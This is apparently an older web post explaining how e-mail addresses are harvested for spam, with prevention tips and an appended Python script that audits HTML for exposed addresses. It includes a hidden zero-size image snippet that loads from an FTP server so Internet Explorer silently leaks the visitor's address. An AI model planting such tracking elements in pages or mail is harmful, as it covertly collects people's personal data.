It is scary how easily mail addresses are collected. I think we should have a closer look at how it might be done:
- Chain letters
Chain letters are a wonderful way of collecting addresses, as they have traveled a while before you get them. Most people just hit the forward button and send them on right away. The other mail addresses are sent along with it, including your own.
- Newsgroups and boards
OK, nowadays newsgroups are pretty dead, but they still exist. They are something like a public mailbox. Everything posted in there usually comes with a valid mail address.
- Messenger and community profiles
You all know ICQ and similar messengers? They all offer profile pages. They can be harvested without much hassle by either spidering the webpage or (ab)using the internal search protocols.
- Guestbooks
Guestbooks were often used on private homepages for communication with the webmaster, to leave a line like 'great site'. Most often the names of the people leaving a comment are linked to their mail address.
- Spiders
A spider is an automated program surfing the web to collect information; search engines use them to index your site. It is not a big hassle to make one that collects mail addresses while spidering around.
- Info leaks in software
OK, this is really my favorite one. Just imagine you have Internet Explorer installed along with some mail client. If you 'surf' to an FTP site, you are logged in there automatically as an anonymous user. According to the protocol, you are required to leave your mail address (which gets logged). Keeping that in mind, we can be nasty and let the user load an image from an FTP server. To hide it, we just make it 0x0 px or transparent:
<img src="ftp://ftp.example.com/path/to/picture.gif" width="0" height="0" alt="SpyImage">
IE just passes on your mail address without a word of warning.
But how to prevent that? First of all, I have some junk addresses just for doing registrations and stuff which I do not want to do with my main address. The next thing is that I do not enter mail addresses in guestbooks or profiles if not required. The ones who want one may have my message sink. Mail addresses on my websites are never written in plaintext for easy spidering. Regarding the FTP issue... I am not aware that there is an IE version for Linux...
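
To check your own pages (or an HTML mail you received) for the two exposures described above, here is an added example that is not part of the original post. It flags resources a client would fetch automatically over ftp:// and lists mail addresses a spider could read in plaintext; the names `ExposureAudit`, `audit` and the sample page are assumptions made for this illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes that make a browser or mail client fetch a resource on its own.
AUTOLOAD_ATTRS = {"src", "background", "data", "poster"}
# Deliberately simple pattern: enough to flag what a spider would pick up.
ADDRESS_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


class ExposureAudit(HTMLParser):
    """Collects auto-loaded ftp:// references and readable mail addresses."""

    def __init__(self):
        # convert_charrefs=True decodes entities such as &#64; before we see them.
        super().__init__(convert_charrefs=True)
        self.ftp_loads = []      # (tag, attribute, url)
        self.addresses = set()

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            value = (value or "").strip()
            if name in AUTOLOAD_ATTRS and urlsplit(value).scheme.lower() == "ftp":
                self.ftp_loads.append((tag, name, value))
            if name == "href" and value.lower().startswith("mailto:"):
                self.addresses.update(ADDRESS_RE.findall(value))

    def handle_data(self, data):
        self.addresses.update(ADDRESS_RE.findall(data))


def audit(html_text):
    """Return (ftp_loads, sorted plaintext addresses) for one HTML document."""
    parser = ExposureAudit()
    parser.feed(html_text)
    parser.close()
    return parser.ftp_loads, sorted(parser.addresses)


# Constructed sample page (not taken from the original post).
SAMPLE = """<html><body>
<p>Contact: <a href="mailto:webmaster@example.org">mail me</a> or bob@example.net</p>
<p>Entity-encoded: carol&#64;example.org</p>
<p>Obfuscated: alice (at) example (dot) com</p>
<img src="ftp://ftp.example.com/path/to/picture.gif" width="0" height="0" alt="SpyImage">
<img src="https://www.example.org/logo.png" alt="logo">
</body></html>"""

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

In the sample, the entity-encoded address is still reported, because any HTML parser decodes `&#64;` back to `@`; only the "(at)/(dot)" form escapes this simple pattern.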